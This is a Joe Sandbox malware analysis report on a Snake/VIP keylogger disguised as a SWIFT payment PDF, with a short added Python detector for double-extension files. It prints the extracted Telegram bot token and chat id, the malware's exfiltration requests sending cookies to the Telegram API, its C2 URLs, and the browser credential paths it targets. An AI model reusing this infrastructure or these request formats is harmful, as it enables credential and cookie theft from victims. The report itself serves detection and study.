Windows Analysis Report
Swift Copy TT USDUSD$23,401.PDF.exe

Overview

General Information

Sample name: Swift Copy TT USDUSD$23,401.PDF.exe
Analysis ID: 1608142
MD5: 4c1cc99d52126a69b0b94f56e17678e3
SHA1: c16d14509fbcdcd2e01c09af49ae9876e5200955
SHA256: 47af16cc5a248cf055155a57d1eb07844113a00c7a84802588ef7dc5f007880d
Tags: exe, SWIFT, user-cocaman

Detection

Snake Keylogger, VIP Keylogger
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Malware configuration (extracted)

Telegram RAT: {"C2 url": "https://api.telegram.org/bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendMessage"}
VIP Keylogger: {"Exfil Mode": "Telegram", "Bot Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat id": "7128988401", "Version": "4.4"}
Snake Keylogger: {"Exfil Mode": "Telegram", "Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat_id": "7128988401", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2e112:$a1: get_encryptedPassword
  • 0x2e43b:$a2: get_encryptedUsername
  • 0x2df22:$a3: get_timePasswordChanged
  • 0x2e02b:$a4: get_passwordField
  • 0x2e128:$a5: set_encryptedPassword
  • 0x2f7e2:$a7: get_logins
  • 0x2f745:$a10: KeyLoggerEventArgs
  • 0x2f3aa:$a11: KeyLoggerEventArgsEventHandler
(5 of 15 entries shown)
Source | Rule | Description | Author | Strings
0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2c512:$a1: get_encryptedPassword
  • 0x2c83b:$a2: get_encryptedUsername
  • 0x2c322:$a3: get_timePasswordChanged
  • 0x2c42b:$a4: get_passwordField
  • 0x2c528:$a5: set_encryptedPassword
  • 0x2dbe2:$a7: get_logins
  • 0x2db45:$a10: KeyLoggerEventArgs
  • 0x2d7aa:$a11: KeyLoggerEventArgsEventHandler
0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3a2a1:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x39944:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39ba1:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3a580:$a5: \Kometa\User Data\Default\Login Data
(5 of 27 entries shown)

                System Summary

Sigma detected: Suspicious Double Extension File Execution
Source: Process started
Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe", CommandLine: "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe", CommandLine|base64offset|contains: r, Image: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe, NewProcessName: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe, OriginalFileName: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe", ProcessId: 6716, ProcessName: Swift Copy TT USDUSD$23,401.PDF.exe
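The Sigma match above keys on nothing more than the file name: a document-looking extension (".PDF") immediately followed by one Windows will execute (".exe"). The Python below is an added example, not taken from the report and not the Sigma rule's own code, that applies the same check to process-creation events. The event dicts are constructed here in a Sysmon-style shape; the first one mirrors the process recorded above, the others are made up to show a clean miss and a padded-name variant.

```python
"""Double-extension executable detection over process-creation events.

Added example (not from the Joe Sandbox report and not Sigma's rule code):
it reproduces the idea behind the "Suspicious Double Extension File Execution"
match above.  Event dicts are constructed here in a Sysmon EventID 1 shape.
"""
import ntpath
import re

# Extensions a victim would read as a harmless document or image ...
DECOY_EXTENSIONS = ("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
                    "jpg", "jpeg", "png", "gif", "txt", "rtf", "csv")
# ... followed by an extension Windows will actually execute.
EXEC_EXTENSIONS = ("exe", "scr", "com", "pif", "bat", "cmd", "vbs",
                   "js", "jse", "wsf", "hta", "msi")

# Allow padding spaces between the two extensions ("invoice.jpg   .scr"),
# a common trick to push the real extension out of view in Explorer.
DOUBLE_EXT_RE = re.compile(
    r"\.(?P<decoy>" + "|".join(DECOY_EXTENSIONS) + r")"
    r"\s*\.(?P<exec>" + "|".join(EXEC_EXTENSIONS) + r")$",
    re.IGNORECASE,
)


def classify_image(image_path):
    """Return (decoy_ext, exec_ext) when the file name ends in decoy.exec, else None."""
    name = ntpath.basename(image_path.strip('"'))
    match = DOUBLE_EXT_RE.search(name)
    if not match:
        return None
    return match.group("decoy").lower(), match.group("exec").lower()


def find_double_extension_executions(events):
    """Return one alert dict per process-creation event whose Image matches."""
    alerts = []
    for event in events:
        hit = classify_image(event.get("Image", ""))
        if hit is None:
            continue
        alerts.append({
            "ProcessId": event.get("ProcessId"),
            "Image": event.get("Image"),
            "decoy_extension": hit[0],
            "real_extension": hit[1],
        })
    return alerts


# Constructed sample events; the first mirrors the process recorded in the report.
SAMPLE_EVENTS = [
    {"ProcessId": 6716,
     "Image": r"C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"'},
    {"ProcessId": 1234, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ProcessId": 4321, "Image": r"C:\Users\user\Downloads\invoice.jpg   .scr",
     "CommandLine": r'"C:\Users\user\Downloads\invoice.jpg   .scr"'},
    {"ProcessId": 5555, "Image": r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
     "CommandLine": r'"C:\Program Files\Adobe\Acrobat\Acrobat.exe" report.pdf'},
]

if __name__ == "__main__":
    for alert in find_double_extension_executions(SAMPLE_EVENTS):
        print(alert)
```

Padding spaces between the two extensions are accepted on purpose, because Explorer truncates long names and hides the tail. The right-to-left override trick (U+202E), which reverses the displayed extension, is a different check and is not covered here. Tune DECOY_EXTENSIONS to the attachment types your users actually receive; a name like "Acrobat.exe" never matches because nothing in the decoy list precedes the executable extension.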
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-06T09:21:10.027664+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.64.1 | 443 | TCP
2025-02-06T09:21:07.101757+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 132.226.247.73 | 80 | TCP
2025-02-06T09:21:09.393545+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 132.226.247.73 | 80 | TCP
2025-02-06T09:21:10.758017+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 132.226.247.73 | 80 | TCP
2025-02-06T09:21:29.160296+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49760 | 149.154.167.220 | 443 | TCP
2025-02-06T09:21:23.102526+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49755 | 149.154.167.220 | 443 | TCP


                AV Detection

Source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat_id": "7128988401", "Version": "4.4"}
Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat id": "7128988401", "Version": "4.4"}
Source: Swift Copy TT USDUSD$23,401.PDF.exe.5804.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendMessage"}
Source: Swift Copy TT USDUSD$23,401.PDF.exe | Virustotal: Detection: 47%
Source: Swift Copy TT USDUSD$23,401.PDF.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Swift Copy TT USDUSD$23,401.PDF.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

Source: Swift Copy TT USDUSD$23,401.PDF.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: Swift Copy TT USDUSD$23,401.PDF.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Binary string: YuCz.pdbSHA256 | source: Swift Copy TT USDUSD$23,401.PDF.exe
Source: Binary string: YuCz.pdb | source: Swift Copy TT USDUSD$23,401.PDF.exe

Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 010CF45Dh | 2_2_010CF2C0
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 010CF45Dh | 2_2_010CF4AC
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 010CFC19h | 2_2_010CF961
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069A3308h | 2_2_069A2EF0
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069A2D41h | 2_2_069A2A90
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069A3308h | 2_2_069A2EE7
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_069A0673
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AD919h | 2_2_069AD670
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AEA79h | 2_2_069AE7D0
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AE1C9h | 2_2_069ADF20
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AF781h | 2_2_069AF4D8
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AEED1h | 2_2_069AEC28
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AD069h | 2_2_069ACDC0
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069ADD71h | 2_2_069ADAC8
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AD4C1h | 2_2_069AD218
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069A3308h | 2_2_069A3236
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069A0D0Dh | 2_2_069A0B30
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069A16F8h | 2_2_069A0B30
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AE621h | 2_2_069AE378
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AF329h | 2_2_069AF080
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_069A0853
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_069A0040
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 4x nop then jmp 069AFBD9h | 2_2_069AF930

                Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49760 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49755 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.4:57156 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (9 requests, one of them without the Connection header; none carries a User-Agent header)
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2006/02/2025%20/%2020:31:18%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
  (bot token and chat_id are empty in this request; decoded text: " \r\n\r\nPC Name:124406\r\nDate and Time: 06/02/2025 / 20:31:18\r\nCountry Name: United States\r\n[ 124406 Clicked on the File If you see nothing this's mean the system storage's empty. ]")
Source: global traffic | HTTP traffic detected: POST /bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd474b275f999b | Host: api.telegram.org | Content-Length: 7046
  (sendDocument upload with the full bot token in the URL path; decoded caption: " Pc Name: user | / VIP Recovery \\\r\n\r\nCookies | user | VIP Recovery")
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.64.1
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.64.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive (10 requests, three of them without the Connection header)
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 06 Feb 2025 08:21:23 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Swift Copy TT USDUSD$23,401.PDF.exe | String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory (licence and font-foundry URLs of the kind carried in embedded font metadata):
  • http://www.apache.org/licenses/LICENSE-2.0
  • http://www.carterandcone.coml
  • http://www.fontbureau.com
  • http://www.fontbureau.com/designers
  • http://www.fontbureau.com/designers/?
  • http://www.fontbureau.com/designers/cabarga.htmlN
  • http://www.fontbureau.com/designers/frere-user.html
  • http://www.fontbureau.com/designers8
  • http://www.fontbureau.com/designers?
  • http://www.fontbureau.com/designersG
  • http://www.fonts.com
  • http://www.founder.com.cn/cn
  • http://www.founder.com.cn/cn/bThe
  • http://www.founder.com.cn/cn/cThe
  • http://www.galapagosdesign.com/DPlease
  • http://www.galapagosdesign.com/staff/dennis.htm
  • http://www.goodfont.co.kr
  • http://www.jiyu-kobo.co.jp/
  • http://www.sajatypeworks.com
  • http://www.sakkal.com (also in 00000000.00000002.1677371559.0000000005604000.00000004.00000020.00020000.00000000.sdmp)
  • http://www.sandoll.co.kr
  • http://www.tiro.com
  • http://www.typography.netD
  • http://www.urwpp.deDPlease
  • http://www.zhongyicts.com.cn
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendDocument?chat_id=7128
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3C000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.00000000040B5000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
